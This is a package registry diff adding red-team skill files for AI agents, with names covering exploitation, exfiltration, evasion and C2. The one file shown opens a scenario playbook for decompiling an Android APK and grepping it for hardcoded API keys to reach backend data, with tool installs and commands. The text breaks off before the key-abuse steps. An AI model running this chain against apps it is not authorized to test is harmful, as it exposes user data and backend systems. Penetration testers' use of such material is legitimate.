rtexit-method 0.1.0 → 0.1.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +2 -5
- package/packaged-assets/.agents/skills/rt-active-recon/SKILL.md +767 -0
- package/packaged-assets/.agents/skills/rt-active-recon/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-agent-breaker/SKILL.md +65 -0
- package/packaged-assets/.agents/skills/rt-agent-breaker/customize.toml +76 -0
- package/packaged-assets/.agents/skills/rt-agent-commander/SKILL.md +63 -0
- package/packaged-assets/.agents/skills/rt-agent-commander/customize.toml +67 -0
- package/packaged-assets/.agents/skills/rt-agent-ghost/SKILL.md +65 -0
- package/packaged-assets/.agents/skills/rt-agent-ghost/customize.toml +77 -0
- package/packaged-assets/.agents/skills/rt-agent-navigator/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-agent-navigator/customize.toml +61 -0
- package/packaged-assets/.agents/skills/rt-agent-phantom/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-agent-phantom/customize.toml +62 -0
- package/packaged-assets/.agents/skills/rt-agent-scout/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-agent-scout/customize.toml +61 -0
- package/packaged-assets/.agents/skills/rt-agent-scribe/SKILL.md +65 -0
- package/packaged-assets/.agents/skills/rt-agent-scribe/customize.toml +77 -0
- package/packaged-assets/.agents/skills/rt-attack-chain-builder/SKILL.md +476 -0
- package/packaged-assets/.agents/skills/rt-attack-chain-builder/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-attack-surface-map/SKILL.md +1209 -0
- package/packaged-assets/.agents/skills/rt-attack-surface-map/template.md +62 -0
- package/packaged-assets/.agents/skills/rt-autodoc/SKILL.md +258 -0
- package/packaged-assets/.agents/skills/rt-c2-operations/SKILL.md +1072 -0
- package/packaged-assets/.agents/skills/rt-c2-operations/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-compliance-mapper/SKILL.md +773 -0
- package/packaged-assets/.agents/skills/rt-create-sead/SKILL.md +74 -0
- package/packaged-assets/.agents/skills/rt-create-sead/template.md +89 -0
- package/packaged-assets/.agents/skills/rt-create-sead/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-credential-access/SKILL.md +756 -0
- package/packaged-assets/.agents/skills/rt-credential-hunt/SKILL.md +856 -0
- package/packaged-assets/.agents/skills/rt-credential-hunt/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-cvss-calculator/SKILL.md +542 -0
- package/packaged-assets/.agents/skills/rt-cvss-calculator/cvss4-matrix.csv +20 -0
- package/packaged-assets/.agents/skills/rt-data-exfiltration/SKILL.md +784 -0
- package/packaged-assets/.agents/skills/rt-defense-evasion/SKILL.md +987 -0
- package/packaged-assets/.agents/skills/rt-evidence-chain/SKILL.md +712 -0
- package/packaged-assets/.agents/skills/rt-evidence-chain/template.md +31 -0
- package/packaged-assets/.agents/skills/rt-executive-report/SKILL.md +718 -0
- package/packaged-assets/.agents/skills/rt-executive-report/template.md +38 -0
- package/packaged-assets/.agents/skills/rt-executive-report/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-active-directory/SKILL.md +1078 -0
- package/packaged-assets/.agents/skills/rt-exploit-active-directory/ad-checklist.csv +12 -0
- package/packaged-assets/.agents/skills/rt-exploit-active-directory/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-android/SKILL.md +1329 -0
- package/packaged-assets/.agents/skills/rt-exploit-android/masvs-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-exploit-android/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-api/SKILL.md +1547 -0
- package/packaged-assets/.agents/skills/rt-exploit-api/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-auth/SKILL.md +1949 -0
- package/packaged-assets/.agents/skills/rt-exploit-auth/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-bec/SKILL.md +69 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-aws/SKILL.md +865 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-aws/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-azure/SKILL.md +1258 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-gcp/SKILL.md +981 -0
- package/packaged-assets/.agents/skills/rt-exploit-containers/SKILL.md +55 -0
- package/packaged-assets/.agents/skills/rt-exploit-databases/SKILL.md +1374 -0
- package/packaged-assets/.agents/skills/rt-exploit-desktop-mac/SKILL.md +834 -0
- package/packaged-assets/.agents/skills/rt-exploit-desktop-win/SKILL.md +903 -0
- package/packaged-assets/.agents/skills/rt-exploit-desktop-win/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-dotnet/SKILL.md +945 -0
- package/packaged-assets/.agents/skills/rt-exploit-elasticsearch/SKILL.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-electron/SKILL.md +1023 -0
- package/packaged-assets/.agents/skills/rt-exploit-electron/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-file-upload/SKILL.md +1576 -0
- package/packaged-assets/.agents/skills/rt-exploit-file-upload/payloads/README.md +4 -0
- package/packaged-assets/.agents/skills/rt-exploit-file-upload/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-firebase/SKILL.md +54 -0
- package/packaged-assets/.agents/skills/rt-exploit-frameworks/SKILL.md +967 -0
- package/packaged-assets/.agents/skills/rt-exploit-idor/SKILL.md +1693 -0
- package/packaged-assets/.agents/skills/rt-exploit-idor/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-injection/SKILL.md +1860 -0
- package/packaged-assets/.agents/skills/rt-exploit-injection/payloads/sqlmap-tampers.txt +22 -0
- package/packaged-assets/.agents/skills/rt-exploit-injection/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-ios/SKILL.md +1214 -0
- package/packaged-assets/.agents/skills/rt-exploit-ios/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-iot/SKILL.md +91 -0
- package/packaged-assets/.agents/skills/rt-exploit-iot/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-java/SKILL.md +1009 -0
- package/packaged-assets/.agents/skills/rt-exploit-jwt/SKILL.md +1327 -0
- package/packaged-assets/.agents/skills/rt-exploit-jwt/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-mongodb/SKILL.md +67 -0
- package/packaged-assets/.agents/skills/rt-exploit-mssql/SKILL.md +52 -0
- package/packaged-assets/.agents/skills/rt-exploit-mysql/SKILL.md +53 -0
- package/packaged-assets/.agents/skills/rt-exploit-network/SKILL.md +118 -0
- package/packaged-assets/.agents/skills/rt-exploit-network/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-nodejs/SKILL.md +852 -0
- package/packaged-assets/.agents/skills/rt-exploit-osticket/SKILL.md +63 -0
- package/packaged-assets/.agents/skills/rt-exploit-phishing/SKILL.md +173 -0
- package/packaged-assets/.agents/skills/rt-exploit-phishing/templates/README.md +4 -0
- package/packaged-assets/.agents/skills/rt-exploit-phishing/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-php/SKILL.md +1119 -0
- package/packaged-assets/.agents/skills/rt-exploit-physical/SKILL.md +63 -0
- package/packaged-assets/.agents/skills/rt-exploit-physical/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-postgresql/SKILL.md +67 -0
- package/packaged-assets/.agents/skills/rt-exploit-python/SKILL.md +986 -0
- package/packaged-assets/.agents/skills/rt-exploit-redis/SKILL.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-ruby/SKILL.md +61 -0
- package/packaged-assets/.agents/skills/rt-exploit-scada/SKILL.md +1091 -0
- package/packaged-assets/.agents/skills/rt-exploit-ssrf/SKILL.md +1528 -0
- package/packaged-assets/.agents/skills/rt-exploit-ssrf/payloads.txt +23 -0
- package/packaged-assets/.agents/skills/rt-exploit-ssrf/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-vishing/SKILL.md +121 -0
- package/packaged-assets/.agents/skills/rt-exploit-vishing/scripts.md +4 -0
- package/packaged-assets/.agents/skills/rt-exploit-web/SKILL.md +1902 -0
- package/packaged-assets/.agents/skills/rt-exploit-web/owasp-checklist.csv +14 -0
- package/packaged-assets/.agents/skills/rt-exploit-web/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-wireless/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-exploit-wordpress/SKILL.md +1565 -0
- package/packaged-assets/.agents/skills/rt-exploit-wordpress/cves.csv +7 -0
- package/packaged-assets/.agents/skills/rt-exploit-wordpress/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-xss/SKILL.md +1526 -0
- package/packaged-assets/.agents/skills/rt-exploit-xss/payloads.txt +18 -0
- package/packaged-assets/.agents/skills/rt-exploit-xss/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-finding-document/SKILL.md +687 -0
- package/packaged-assets/.agents/skills/rt-finding-document/template.md +71 -0
- package/packaged-assets/.agents/skills/rt-finding-document/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-finding-tracker/SKILL.md +216 -0
- package/packaged-assets/.agents/skills/rt-finding-tracker/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-help/SKILL.md +292 -0
- package/packaged-assets/.agents/skills/rt-help/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-js-analysis/SKILL.md +639 -0
- package/packaged-assets/.agents/skills/rt-js-analysis/patterns.txt +27 -0
- package/packaged-assets/.agents/skills/rt-js-analysis/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-kill-chain-map/SKILL.md +393 -0
- package/packaged-assets/.agents/skills/rt-lateral-movement/SKILL.md +1032 -0
- package/packaged-assets/.agents/skills/rt-lateral-movement/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-methodology-selector/SKILL.md +69 -0
- package/packaged-assets/.agents/skills/rt-methodology-selector/frameworks.csv +10 -0
- package/packaged-assets/.agents/skills/rt-methodology-selector/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-mitre-map/SKILL.md +668 -0
- package/packaged-assets/.agents/skills/rt-mitre-map/tactics.csv +16 -0
- package/packaged-assets/.agents/skills/rt-mitre-map/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-osint/SKILL.md +775 -0
- package/packaged-assets/.agents/skills/rt-osint/osint-sources.csv +12 -0
- package/packaged-assets/.agents/skills/rt-osint/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-party-mode/SKILL.md +249 -0
- package/packaged-assets/.agents/skills/rt-party-mode/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-persistence/SKILL.md +1146 -0
- package/packaged-assets/.agents/skills/rt-persistence/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-poc-writer/SKILL.md +640 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/SKILL.md +998 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/linux-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/windows-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/SKILL.md +1027 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/linux-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/win-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-remediation-roadmap/SKILL.md +665 -0
- package/packaged-assets/.agents/skills/rt-remediation-roadmap/template.md +28 -0
- package/packaged-assets/.agents/skills/rt-risk-matrix/SKILL.md +232 -0
- package/packaged-assets/.agents/skills/rt-rules-of-engagement/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-rules-of-engagement/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-scenario-c001/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-c002/SKILL.md +69 -0
- package/packaged-assets/.agents/skills/rt-scenario-c003/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-c004/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-c005/SKILL.md +72 -0
- package/packaged-assets/.agents/skills/rt-scenario-d001/SKILL.md +378 -0
- package/packaged-assets/.agents/skills/rt-scenario-d002/SKILL.md +392 -0
- package/packaged-assets/.agents/skills/rt-scenario-d003/SKILL.md +522 -0
- package/packaged-assets/.agents/skills/rt-scenario-d004/SKILL.md +373 -0
- package/packaged-assets/.agents/skills/rt-scenario-d005/SKILL.md +458 -0
- package/packaged-assets/.agents/skills/rt-scenario-library/SKILL.md +292 -0
- package/packaged-assets/.agents/skills/rt-scenario-library/scenarios.csv +32 -0
- package/packaged-assets/.agents/skills/rt-scenario-m001/SKILL.md +796 -0
- package/packaged-assets/.agents/skills/rt-scenario-m002/SKILL.md +723 -0
- package/packaged-assets/.agents/skills/rt-scenario-m003/SKILL.md +463 -0
- package/packaged-assets/.agents/skills/rt-scenario-m004/SKILL.md +449 -0
- package/packaged-assets/.agents/skills/rt-scenario-m005/SKILL.md +505 -0
- package/packaged-assets/.agents/skills/rt-scenario-n001/SKILL.md +573 -0
- package/packaged-assets/.agents/skills/rt-scenario-n002/SKILL.md +112 -0
- package/packaged-assets/.agents/skills/rt-scenario-n003/SKILL.md +100 -0
- package/packaged-assets/.agents/skills/rt-scenario-n004/SKILL.md +90 -0
- package/packaged-assets/.agents/skills/rt-scenario-n005/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-w001/SKILL.md +635 -0
- package/packaged-assets/.agents/skills/rt-scenario-w002/SKILL.md +612 -0
- package/packaged-assets/.agents/skills/rt-scenario-w003/SKILL.md +449 -0
- package/packaged-assets/.agents/skills/rt-scenario-w004/SKILL.md +648 -0
- package/packaged-assets/.agents/skills/rt-scenario-w005/SKILL.md +479 -0
- package/packaged-assets/.agents/skills/rt-scenario-w006/SKILL.md +443 -0
- package/packaged-assets/.agents/skills/rt-scenario-w007/SKILL.md +494 -0
- package/packaged-assets/.agents/skills/rt-scenario-w008/SKILL.md +576 -0
- package/packaged-assets/.agents/skills/rt-scenario-w009/SKILL.md +518 -0
- package/packaged-assets/.agents/skills/rt-scenario-w010/SKILL.md +574 -0
- package/packaged-assets/.agents/skills/rt-scope-definition/SKILL.md +79 -0
- package/packaged-assets/.agents/skills/rt-scope-definition/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-shodan-recon/SKILL.md +880 -0
- package/packaged-assets/.agents/skills/rt-status/SKILL.md +64 -0
- package/packaged-assets/.agents/skills/rt-subdomain-enum/SKILL.md +906 -0
- package/packaged-assets/.agents/skills/rt-subdomain-enum/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-technical-report/SKILL.md +710 -0
- package/packaged-assets/.agents/skills/rt-technical-report/template.md +41 -0
- package/packaged-assets/.agents/skills/rt-technical-report/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-threat-model/SKILL.md +59 -0
- package/packaged-assets/.agents/skills/rt-threat-model/template.md +32 -0
- package/packaged-assets/.agents/skills/rt-threat-model/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-timeline/SKILL.md +338 -0
- package/packaged-assets/RTEXIT.md +127 -0
- package/tools/installer/lib/asset-manifest.js +10 -5
- package/tools/installer/lib/copy-assets.js +5 -2
- /package/{_rtexit → packaged-assets/_rtexit}/config.toml +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/config.user.toml +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/custom/config.toml +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/autodoc_engine.py +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/finding_tracker.py +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/resolve_config.py +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/resolve_customization.py +0 -0
- /package/{resources → packaged-assets/resources}/certifications.md +0 -0
- /package/{resources → packaged-assets/resources}/payloads.md +0 -0
- /package/{resources → packaged-assets/resources}/tools.md +0 -0
- /package/{resources → packaged-assets/resources}/wordlists.md +0 -0
- /package/{templates → packaged-assets/templates}/attack-chain-template.md +0 -0
- /package/{templates → packaged-assets/templates}/executive-report-template.md +0 -0
- /package/{templates → packaged-assets/templates}/executive-report.md +0 -0
- /package/{templates → packaged-assets/templates}/finding-template.md +0 -0
- /package/{templates → packaged-assets/templates}/remediation-roadmap.md +0 -0
- /package/{templates → packaged-assets/templates}/sead-template.md +0 -0
- /package/{templates → packaged-assets/templates}/technical-report.md +0 -0
|
@@ -0,0 +1,796 @@
|
|
|
1
|
+
---
|
|
2
|
+
name: rt-scenario-m001
|
|
3
|
+
description: "M-001: Android APK Reverse Engineering → API Key Extraction → Full Backend Access. Domain: mobile. Attack chain: extract APK → decompile with jadx → grep for secrets → find hardcoded API keys → access backend APIs directly. MITRE: T1552.007 → T1078. Real example: App has Firebase key in BuildConfig.java → direct access to user database via Firebase REST API"
|
|
4
|
+
---
|
|
5
|
+
|
|
6
|
+
# M-001: Android APK Reverse Engineering → API Key Extraction → Full Backend Access
|
|
7
|
+
|
|
8
|
+
## Overview
|
|
9
|
+
|
|
10
|
+
**Attack Objective:** Extract a production Android APK, decompile it to recover hardcoded secrets (API keys, Firebase credentials, backend tokens), and use those secrets to authenticate directly to backend infrastructure — bypassing all application-layer controls and accessing data as a privileged service account.
|
|
11
|
+
|
|
12
|
+
**Required Access Level:** None — the APK is pulled from a public source (Google Play Store, app distribution URL, or the device itself via ADB). No prior authentication to the target environment is required.
|
|
13
|
+
|
|
14
|
+
**Estimated Time to Execute:**
|
|
15
|
+
- APK acquisition: 5–15 minutes
|
|
16
|
+
- Decompilation: 5–10 minutes
|
|
17
|
+
- Secret extraction and triage: 15–45 minutes
|
|
18
|
+
- Backend API access validation: 15–60 minutes (depends on API surface)
|
|
19
|
+
|
|
20
|
+
**Detection Risk Level:** Low
|
|
21
|
+
- APK download from public store is indistinguishable from normal user behavior
|
|
22
|
+
- Decompilation is entirely offline and generates zero network noise against the target
|
|
23
|
+
- API calls using a legitimate key look identical to normal application traffic
|
|
24
|
+
- No vulnerability scanner signatures exist for "valid API key abuse"
|
|
25
|
+
|
|
26
|
+
---
|
|
27
|
+
|
|
28
|
+
## Prerequisites
|
|
29
|
+
|
|
30
|
+
### Required Tools
|
|
31
|
+
|
|
32
|
+
```bash
|
|
33
|
+
# apktool — APK decoding and resource extraction
|
|
34
|
+
# Linux / macOS
|
|
35
|
+
sudo apt install apktool
|
|
36
|
+
# or download directly:
|
|
37
|
+
wget https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool \
|
|
38
|
+
-O /usr/local/bin/apktool
|
|
39
|
+
wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar \
|
|
40
|
+
-O /usr/local/bin/apktool.jar
|
|
41
|
+
chmod +x /usr/local/bin/apktool
|
|
42
|
+
|
|
43
|
+
# jadx — Java decompiler (converts .dex bytecode to readable Java/Kotlin)
|
|
44
|
+
# Linux / macOS
|
|
45
|
+
sudo apt install jadx
|
|
46
|
+
# or download release:
|
|
47
|
+
# https://github.com/skylot/jadx/releases
|
|
48
|
+
|
|
49
|
+
# ADB — Android Debug Bridge (for pulling APK directly from a device)
|
|
50
|
+
sudo apt install android-tools-adb
|
|
51
|
+
# macOS with Homebrew:
|
|
52
|
+
brew install android-platform-tools
|
|
53
|
+
|
|
54
|
+
# gplaycli — download APKs from Google Play without a device
|
|
55
|
+
pip3 install gplaycli
|
|
56
|
+
|
|
57
|
+
# apkeep — simpler APK downloader (Google Play and APKPure)
|
|
58
|
+
cargo install apkeep
|
|
59
|
+
# or download binary from: https://github.com/EFForg/apkeep/releases
|
|
60
|
+
|
|
61
|
+
# strings / grep / ripgrep — secret extraction from decompiled output
|
|
62
|
+
sudo apt install ripgrep # rg command — faster than grep for large codebases
|
|
63
|
+
|
|
64
|
+
# trufflehog — automated secret scanner
|
|
65
|
+
pip3 install trufflehog
|
|
66
|
+
# or
|
|
67
|
+
brew install trufflehog
|
|
68
|
+
|
|
69
|
+
# gitleaks — regex-based secret scanner (works on directories, not just git)
|
|
70
|
+
# https://github.com/gitleaks/gitleaks/releases
|
|
71
|
+
wget https://github.com/gitleaks/gitleaks/releases/download/v8.18.2/gitleaks_8.18.2_linux_x64.tar.gz \
|
|
72
|
+
-O - | tar -xz -C /usr/local/bin/
|
|
73
|
+
|
|
74
|
+
# curl / httpie — manual API request crafting
|
|
75
|
+
sudo apt install curl httpie
|
|
76
|
+
|
|
77
|
+
# firebase-tools — interact with Firebase REST API and validate keys
|
|
78
|
+
npm install -g firebase-tools
|
|
79
|
+
|
|
80
|
+
# jq — JSON parsing for API responses
|
|
81
|
+
sudo apt install jq
|
|
82
|
+
```
|
|
83
|
+
|
|
84
|
+
### Required Access or Conditions
|
|
85
|
+
|
|
86
|
+
- The target application is available on a public app store (Google Play, APKPure, APKMirror) or accessible via a direct APK URL
|
|
87
|
+
- Alternatively, physical or ADB access to a rooted or debug-enabled Android device running the target app
|
|
88
|
+
- Outbound internet access from the attacker machine to the target backend (Firebase, AWS, GCP, custom API)
|
|
89
|
+
- Authorization to test the application (confirmed in Rules of Engagement)
|
|
90
|
+
|
|
91
|
+
### Skill Level
|
|
92
|
+
|
|
93
|
+
**BEGINNER / INTERMEDIATE** — APK extraction and decompilation require minimal expertise. API key validation requires basic HTTP and REST API knowledge. Understanding of Firebase or AWS IAM is helpful but not required to execute initial access.
|
|
94
|
+
|
|
95
|
+
---
|
|
96
|
+
|
|
97
|
+
## Attack Chain
|
|
98
|
+
|
|
99
|
+
```
|
|
100
|
+
[1] APK Acquisition
|
|
101
|
+
(Google Play download / ADB pull / APKPure scrape)
|
|
102
|
+
|
|
|
103
|
+
v
|
|
104
|
+
[2] APK Unpacking
|
|
105
|
+
(apktool decode → smali + resources)
|
|
106
|
+
|
|
|
107
|
+
v
|
|
108
|
+
[3] Java/Kotlin Decompilation
|
|
109
|
+
(jadx → readable source code)
|
|
110
|
+
|
|
|
111
|
+
v
|
|
112
|
+
[4] Automated Secret Scanning
|
|
113
|
+
(trufflehog / gitleaks / rg regex patterns)
|
|
114
|
+
|
|
|
115
|
+
v
|
|
116
|
+
[5] Manual Source Review
|
|
117
|
+
(BuildConfig.java, strings.xml, google-services.json,
|
|
118
|
+
assets/, res/raw/, native .so files)
|
|
119
|
+
|
|
|
120
|
+
v
|
|
121
|
+
[6] API Key Identification & Classification
|
|
122
|
+
(Firebase, AWS, GCP, Stripe, Twilio, custom backend tokens)
|
|
123
|
+
|
|
|
124
|
+
v
|
|
125
|
+
[7] Key Validation & Scope Enumeration
|
|
126
|
+
(test key against service APIs — read? write? admin?)
|
|
127
|
+
|
|
|
128
|
+
v
|
|
129
|
+
[8] Backend Access & Data Extraction
|
|
130
|
+
(Firebase REST API, AWS SDK, direct HTTP calls to backend APIs)
|
|
131
|
+
```
|
|
132
|
+
|
|
133
|
+
**MITRE ATT&CK Chain:** T1552.007 (Credentials in Files — Mobile) → T1078 (Valid Accounts)
|
|
134
|
+
|
|
135
|
+
---
|
|
136
|
+
|
|
137
|
+
## Step-by-Step Execution
|
|
138
|
+
|
|
139
|
+
### Step 1 — APK Acquisition
|
|
140
|
+
|
|
141
|
+
Obtain the target APK using the most appropriate method for the engagement.
|
|
142
|
+
|
|
143
|
+
**Method A: Download from Google Play using apkeep**
|
|
144
|
+
|
|
145
|
+
```bash
|
|
146
|
+
# Install apkeep if not already installed
|
|
147
|
+
# Download from https://github.com/EFForg/apkeep/releases
|
|
148
|
+
|
|
149
|
+
# Download APK by package name (no device required, but needs a Google account)
|
|
150
|
+
apkeep -a com.targetapp.android -d GooglePlay -e your@gmail.com -r yourpassword \
|
|
151
|
+
-o ./apks/
|
|
152
|
+
|
|
153
|
+
# List available APK versions
|
|
154
|
+
apkeep -a com.targetapp.android -d GooglePlay --list-versions
|
|
155
|
+
```
|
|
156
|
+
|
|
157
|
+
**Method B: Pull APK directly from a connected Android device via ADB**
|
|
158
|
+
|
|
159
|
+
```bash
|
|
160
|
+
# Connect device via USB with USB debugging enabled
|
|
161
|
+
adb devices
|
|
162
|
+
# Expected: List of attached devices with serial numbers
|
|
163
|
+
|
|
164
|
+
# Find the package name of the target app
|
|
165
|
+
adb shell pm list packages | grep -i targetapp
|
|
166
|
+
# Expected: package:com.targetapp.android
|
|
167
|
+
|
|
168
|
+
# Get the full path of the installed APK
|
|
169
|
+
adb shell pm path com.targetapp.android
|
|
170
|
+
# Expected: package:/data/app/com.targetapp.android-1/base.apk
|
|
171
|
+
|
|
172
|
+
# Pull the APK to the local machine
|
|
173
|
+
adb pull /data/app/com.targetapp.android-1/base.apk ./targetapp.apk
|
|
174
|
+
```
|
|
175
|
+
|
|
176
|
+
**Expected Output:**
|
|
177
|
+
```
|
|
178
|
+
/data/app/com.targetapp.android-1/base.apk: 1 file pulled, 0 skipped. 24.5 MB/s (18432000 bytes in 0.718s)
|
|
179
|
+
```
|
|
180
|
+
|
|
181
|
+
**Method C: Download from APKMirror or APKPure (no account required)**
|
|
182
|
+
|
|
183
|
+
```bash
|
|
184
|
+
# Manual browser download from https://www.apkmirror.com
|
|
185
|
+
# Search by package name or app name, download the APK directly
|
|
186
|
+
|
|
187
|
+
# Verify APK integrity after download
|
|
188
|
+
file targetapp.apk
|
|
189
|
+
# Expected: targetapp.apk: Zip archive data, at least v2.0 to extract
|
|
190
|
+
```
|
|
191
|
+
|
|
192
|
+
**Fallback:** If the app uses split APKs (APKS/XAPK bundle), extract the base APK:
|
|
193
|
+
```bash
|
|
194
|
+
unzip targetapp.xapk -d xapk_contents/
|
|
195
|
+
# base.apk is the primary APK; additional split APKs contain resources
|
|
196
|
+
cp xapk_contents/base.apk ./targetapp.apk
|
|
197
|
+
```
|
|
198
|
+
|
|
199
|
+
---
|
|
200
|
+
|
|
201
|
+
### Step 2 — APK Unpacking with apktool
|
|
202
|
+
|
|
203
|
+
Decode the APK to access smali bytecode, XML resources, and raw assets.
|
|
204
|
+
|
|
205
|
+
```bash
|
|
206
|
+
# Decode the APK (do not re-sign or rebuild — decode only)
|
|
207
|
+
apktool decode targetapp.apk -o targetapp_decoded/ --no-src
|
|
208
|
+
|
|
209
|
+
# For full decode including smali (bytecode) sources:
|
|
210
|
+
apktool decode targetapp.apk -o targetapp_decoded/
|
|
211
|
+
|
|
212
|
+
# Inspect the decoded directory structure
|
|
213
|
+
ls targetapp_decoded/
|
|
214
|
+
```
|
|
215
|
+
|
|
216
|
+
**Expected Output:**
|
|
217
|
+
```
|
|
218
|
+
targetapp_decoded/
|
|
219
|
+
├── AndroidManifest.xml ← permissions, exported components, intent filters
|
|
220
|
+
├── apktool.yml
|
|
221
|
+
├── assets/ ← raw asset files: .json, .xml, .pem, .db, config files
|
|
222
|
+
├── lib/ ← native .so libraries (may contain hardcoded strings)
|
|
223
|
+
├── res/
|
|
224
|
+
│ ├── raw/ ← raw resources: certificates, config files
|
|
225
|
+
│ ├── values/
|
|
226
|
+
│ │ ├── strings.xml ← string constants — common key storage location
|
|
227
|
+
│ │ └── ...
|
|
228
|
+
└── smali/ ← Dalvik bytecode (readable assembly)
|
|
229
|
+
└── com/targetapp/...
|
|
230
|
+
```
|
|
231
|
+
|
|
232
|
+
**Fallback:** If apktool fails due to resource compilation errors, use the `--force` flag:
|
|
233
|
+
```bash
|
|
234
|
+
apktool decode targetapp.apk -o targetapp_decoded/ --force --no-src
|
|
235
|
+
```
|
|
236
|
+
|
|
237
|
+
---
|
|
238
|
+
|
|
239
|
+
### Step 3 — Java/Kotlin Decompilation with jadx
|
|
240
|
+
|
|
241
|
+
Convert Dalvik bytecode to readable Java/Kotlin source code.
|
|
242
|
+
|
|
243
|
+
```bash
|
|
244
|
+
# Decompile APK to Java source (output to directory)
|
|
245
|
+
jadx targetapp.apk -d targetapp_java/
|
|
246
|
+
|
|
247
|
+
# Enable more aggressive decompilation options
|
|
248
|
+
jadx targetapp.apk -d targetapp_java/ \
|
|
249
|
+
--deobf \
|
|
250
|
+
--show-bad-code \
|
|
251
|
+
--export-gradle
|
|
252
|
+
|
|
253
|
+
# Launch the jadx GUI for interactive exploration (optional)
|
|
254
|
+
jadx-gui targetapp.apk
|
|
255
|
+
```
|
|
256
|
+
|
|
257
|
+
**Expected Output:**
|
|
258
|
+
```
|
|
259
|
+
INFO - loading ...
|
|
260
|
+
INFO - processing ...
|
|
261
|
+
INFO - done
|
|
262
|
+
```
|
|
263
|
+
|
|
264
|
+
```
|
|
265
|
+
targetapp_java/
|
|
266
|
+
└── sources/
|
|
267
|
+
└── com/targetapp/android/
|
|
268
|
+
├── BuildConfig.java ← CRITICAL: hardcoded build-time constants
|
|
269
|
+
├── MainActivity.java
|
|
270
|
+
├── network/
|
|
271
|
+
│ ├── ApiClient.java ← API base URLs, auth headers
|
|
272
|
+
│ └── RetrofitConfig.java
|
|
273
|
+
└── utils/
|
|
274
|
+
└── Constants.java ← application-wide constants
|
|
275
|
+
```
|
|
276
|
+
|
|
277
|
+
**Fallback:** If jadx produces incomplete output, supplement with apktool's smali output. Smali is readable assembly — search for `const-string` instructions containing key-like values:
|
|
278
|
+
```bash
|
|
279
|
+
grep -r "const-string" targetapp_decoded/smali/ | grep -i "key\|token\|secret\|api\|auth"
|
|
280
|
+
```
|
|
281
|
+
|
|
282
|
+
---
|
|
283
|
+
|
